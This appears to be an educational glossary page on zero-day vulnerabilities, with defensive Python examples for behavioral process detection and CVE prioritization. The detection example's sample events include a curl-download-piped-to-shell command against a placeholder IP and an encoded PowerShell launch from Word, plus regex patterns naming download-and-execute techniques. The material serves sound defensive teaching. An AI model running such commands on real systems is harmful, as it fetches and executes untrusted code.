
Zero-Day Vulnerability

zero-day vulnerabilities exploits patching
Plain English

A zero-day is a security flaw that the software vendor does not yet know about, so nobody has started fixing it: the vendor has had “zero days” to work on a patch. Whoever finds the flaw first decides what happens next. A researcher can report it privately; an attacker can exploit it while there is no patch, no update, and no signature that would recognise the attack. Until someone notices the attack or reports the flaw and the vendor ships a fix, the only defenses are generic ones such as least privilege, sandboxing, and monitoring for unusual behavior rather than for the specific bug.

Technical Definition

A zero-day vulnerability is a software security flaw that is unknown to the software vendor and for which no patch or mitigation exists at the time of discovery or exploitation. The term “zero-day” refers to the number of days the vendor has had to address the vulnerability (zero).

Lifecycle:

  1. Discovery: a researcher or attacker finds the vulnerability
  2. Exploitation (0-day): if an attacker discovers it, the flaw may be weaponized into a working exploit and used before the vendor is aware
  3. Disclosure: the vendor is notified (coordinated or “responsible” disclosure) or the exploit is detected in the wild
  4. Patch development: the vendor creates and tests a fix
  5. Patch release: the vendor distributes the update
  6. Patch adoption: users and organizations apply the patch; until they do, the flaw is an N-day and the “patch gap” period remains dangerous

Zero-day vs. related terms:

  • Zero-day vulnerability: the flaw itself
  • Zero-day exploit: working code that takes advantage of the flaw
  • Zero-day attack: an attack using the exploit in the wild before a patch is available
  • N-day: a publicly known vulnerability with a patch available that has not yet been applied everywhere (N-day exploitation is far more common than true zero-day exploitation)

CVE (Common Vulnerabilities and Exposures) identifiers are reserved by a CVE Numbering Authority (CNA) and published when the vulnerability is publicly disclosed, enabling consistent tracking across vendors and tools (e.g., CVE-2024-3094 for the XZ Utils backdoor). A true zero-day therefore usually has no public CVE yet; the identifier appears at disclosure.

CVSS (Common Vulnerability Scoring System) rates severity on a 0-10 scale: Critical (9.0-10.0), High (7.0-8.9), Medium (4.0-6.9), Low (0.1-3.9), None (0.0). CVSS measures technical severity, not whether a flaw is actually being exploited; CISA's Known Exploited Vulnerabilities (KEV) catalog tracks the latter and is the stronger signal for patch prioritization.

Detection without signatures:

  • Behavioral analysis (EDR/XDR flagging anomalous process behavior, e.g., a document viewer or database server spawning a shell)
  • Network traffic anomaly detection (unexpected destinations, protocols, or volumes)
  • Sandboxing and detonation (executing suspicious files in isolated environments and observing what they do)
  • Threat hunting (proactively searching telemetry for indicators of compromise and attacker techniques rather than waiting for an alert)
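
The behavioral approach above can be shown concretely. The following is an added example, not code from the original page: it scores process-creation events (constructed here in the spirit of Sysmon event ID 1 or auditd execve records; the field names, hosts, paths, and the IP address 198.51.100.7 are this example's own) on two signals that need no knowledge of the underlying bug, an unusual parent-child pair and a suspicious command line. It goes slightly beyond the bullet list by combining both signals into one score so that a chain such as a word processor spawning an encoded PowerShell command ranks above either signal alone.

```python
"""Signature-free detection: score process lineage and command lines.

Added example, not code from the original page. A zero-day exploit has no
signature, but post-exploitation behavior often does: a document viewer,
browser or server process spawning an interpreter, or a shell running a
download-and-execute one-liner. All events, hosts, paths and the address
198.51.100.7 below are constructed for illustration.
"""
import re

# Constructed process-creation events: parent image, image, command line.
EVENTS = [
    {"ts": "2024-03-29T09:01:02", "host": "ws-17", "user": "alice",
     "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -enc SQBFAFgA"},
    {"ts": "2024-03-29T09:01:03", "host": "ws-17", "user": "alice",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enc SQBFAFgA"},
    {"ts": "2024-03-29T09:15:00", "host": "ws-17", "user": "alice",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "report.docx"'},
    {"ts": "2024-03-29T10:02:11", "host": "srv-db1", "user": "postgres",
     "parent": "/usr/lib/postgresql/15/bin/postgres",
     "image": "/bin/sh",
     "cmdline": "sh -c 'curl -s http://198.51.100.7/x | sh'"},
    {"ts": "2024-03-29T10:30:00", "host": "srv-db1", "user": "root",
     "parent": "/usr/sbin/cron", "image": "/bin/sh",
     "cmdline": "sh -c /usr/local/bin/backup.sh"},
]

# Parents that have no ordinary reason to spawn an interpreter (example list).
DOCUMENT_HANDLERS = re.compile(
    r"(winword|excel|powerpnt|acrord32|outlook|chrome|firefox|postgres|httpd|nginx|java)(\.exe)?$",
    re.I)
INTERPRETERS = re.compile(
    r"(cmd|powershell|pwsh|wscript|cscript|mshta|sh|bash|python[0-9.]*|perl)(\.exe)?$", re.I)
# Command-line patterns rarely legitimate when launched from such a parent.
SUSPICIOUS_CMD = [
    (re.compile(r"-(enc|encodedcommand)\s", re.I), "encoded PowerShell"),
    (re.compile(r"(curl|wget)\s.*\|\s*(sh|bash)", re.I), "download piped to shell"),
    (re.compile(r"certutil.*-urlcache|bitsadmin.*/transfer", re.I), "LOLBin download"),
]


def basename(path):
    """Last path component, tolerant of both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def score_event(ev):
    """Return (score, reasons) for one event; 0 means nothing unusual was seen."""
    score, reasons = 0, []
    parent, image = basename(ev["parent"]), basename(ev["image"])
    if DOCUMENT_HANDLERS.search(parent) and INTERPRETERS.search(image):
        score += 50
        reasons.append(f"{parent} spawned interpreter {image}")
    for pattern, label in SUSPICIOUS_CMD:
        if pattern.search(ev["cmdline"]):
            score += 30
            reasons.append(label)
    return score, reasons


def hunt(events, threshold=30):
    """Return events scoring at or above threshold, highest first, for triage."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"ts": ev["ts"], "host": ev["host"],
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit["ts"], hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

Run stand-alone it prints the two 80-point chains (Word spawning an encoded PowerShell command, and the database server spawning a shell that pipes a download into sh) followed by the lone encoded-PowerShell event; the cron job and the normal Word launch score 0. The regexes are deliberately simple allow/deny heuristics; in production the parent/child baseline would be learned from the fleet rather than hard-coded.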

Tracking zero-days with CVE data

# Search NVD (National Vulnerability Database) for recent critical CVEs
# (unauthenticated requests are rate-limited; send an apiKey header for higher limits)
$ curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cvssV3Severity=CRITICAL&resultsPerPage=5" | \
  jq '.vulnerabilities[].cve | {id, description: (.descriptions[] | select(.lang == "en") | .value)}'

# Check whether the package behind a CVE is installed, and at what version
# (CVE-2024-3094 affected xz/liblzma 5.6.0 and 5.6.1; the Debian package names are
# xz-utils and liblzma5, not "libxz")
$ dpkg-query -W xz-utils liblzma5   # Debian/Ubuntu
$ rpm -q xz xz-libs                 # RHEL/Fedora
$ xz --version                      # either family

# Subscribe to vendor security advisories
# Ubuntu: https://ubuntu.com/security/notices
# NIST NVD: https://nvd.nist.gov/
# CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog

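
Once the NVD and KEV data are fetched, the useful step is combining them: CVSS says how bad a flaw is, KEV says whether it is being exploited. The following added example (not code from the original page) parses two constructed JSON documents shaped like the NVD API 2.0 response and the CISA KEV feed (the real feed is published at https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json) and ranks CVEs with known-exploited and overdue entries first, then by CVSS score. The CVE IDs CVE-2024-0001 through CVE-2024-0003, their scores, dates and product names are constructed for illustration and do not refer to real advisories.

```python
"""Prioritize CVEs by exploitation evidence, not CVSS alone.

Added example, not code from the original page. The two JSON samples mimic
the NVD API 2.0 response and the CISA KEV feed; every CVE ID, score, date and
product name in them is constructed for illustration.
"""
import json
from datetime import date

# Constructed sample in NVD API 2.0 shape, trimmed to the fields used here.
NVD_SAMPLE = json.dumps({
    "vulnerabilities": [
        {"cve": {"id": "CVE-2024-0001",
                 "descriptions": [{"lang": "en", "value": "Constructed: RCE in example-httpd"}],
                 "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 9.8, "baseSeverity": "CRITICAL"}}]}}},
        {"cve": {"id": "CVE-2024-0002",
                 "descriptions": [{"lang": "en", "value": "Constructed: privilege escalation in example-agent"}],
                 "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 7.8, "baseSeverity": "HIGH"}}]}}},
        {"cve": {"id": "CVE-2024-0003",
                 "descriptions": [{"lang": "en", "value": "Constructed: info leak in example-lib"}],
                 "metrics": {}}},  # no CVSS yet, common right after disclosure
    ]
})

# Constructed sample in CISA KEV feed shape.
KEV_SAMPLE = json.dumps({
    "vulnerabilities": [
        {"cveID": "CVE-2024-0002", "dateAdded": "2024-03-06",
         "dueDate": "2024-03-27", "knownRansomwareCampaignUse": "Known"},
    ]
})


def load_nvd(text):
    """Return {cve_id: {"score": float or None, "severity": str, "description": str}}."""
    out = {}
    for item in json.loads(text)["vulnerabilities"]:
        cve = item["cve"]
        metric = cve.get("metrics", {}).get("cvssMetricV31", [])
        data = metric[0]["cvssData"] if metric else {}
        desc = next((d["value"] for d in cve.get("descriptions", []) if d["lang"] == "en"), "")
        out[cve["id"]] = {"score": data.get("baseScore"),
                          "severity": data.get("baseSeverity", "UNSCORED"),
                          "description": desc}
    return out


def load_kev(text):
    """Return {cve_id: {"due": date, "ransomware": bool}} from a KEV-shaped document."""
    return {v["cveID"]: {"due": date.fromisoformat(v["dueDate"]),
                         "ransomware": v.get("knownRansomwareCampaignUse") == "Known"}
            for v in json.loads(text)["vulnerabilities"]}


def prioritize(nvd, kev, today):
    """Rank CVEs: overdue KEV entries first, then other KEV entries, then by CVSS.

    Unscored CVEs sort last but stay in the list so they are not silently dropped.
    """
    def sort_key(cve_id):
        score = nvd[cve_id]["score"]
        exploited = cve_id in kev
        overdue = exploited and kev[cve_id]["due"] < today
        return (not overdue, not exploited, -(score if score is not None else -1.0))

    ranked = []
    for cve_id in sorted(nvd, key=sort_key):
        rec = nvd[cve_id]
        ranked.append({"id": cve_id, "severity": rec["severity"], "score": rec["score"],
                       "exploited": cve_id in kev,
                       "overdue": cve_id in kev and kev[cve_id]["due"] < today,
                       "description": rec["description"]})
    return ranked


def prioritized_ids(nvd_text, kev_text, today_iso):
    """Convenience wrapper: ranked CVE IDs for an ISO-8601 date string."""
    return [r["id"] for r in prioritize(load_nvd(nvd_text), load_kev(kev_text),
                                        date.fromisoformat(today_iso))]


if __name__ == "__main__":
    for row in prioritize(load_nvd(NVD_SAMPLE), load_kev(KEV_SAMPLE), date(2024, 4, 1)):
        print(row["id"], row["severity"], row["score"],
              "EXPLOITED" if row["exploited"] else "", "OVERDUE" if row["overdue"] else "")
```

With the constructed data the HIGH-rated CVE-2024-0002 ranks above the CRITICAL CVE-2024-0001 because it is in KEV and past its due date, which is the point: exploitation evidence should outrank raw severity when deciding what to patch today. To use real data, replace the two samples with the bodies returned by the curl command above and by the KEV JSON feed.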
In the Wild

Zero-days command premium prices on the vulnerability market. Legitimate bug bounty programs pay $10,000 to $500,000+ for critical zero-days, while exploit brokers and the black market pay significantly more for reliable, weaponized exploits targeting iOS, Chrome, or Windows. Nation-state actors stockpile zero-days for intelligence operations (Stuxnet used four Windows zero-days).

The XZ Utils backdoor (CVE-2024-3094) showed that a supply-chain compromise can behave like a zero-day: a malicious contributor who had spent roughly two years building trust as a maintainer inserted a backdoor into liblzma, a widely used compression library that several distributions link into sshd, and no scanner was looking for it. It was caught not by a signature but by a developer investigating unexpected CPU use and slow SSH logins, which is exactly the behavioral detection described above.

Organizations defend against zero-days through defense-in-depth: network segmentation, least-privilege access, EDR with behavioral detection, and rapid patching of N-day vulnerabilities, which removes the far larger number of known flaws an attacker would otherwise use instead of spending a zero-day.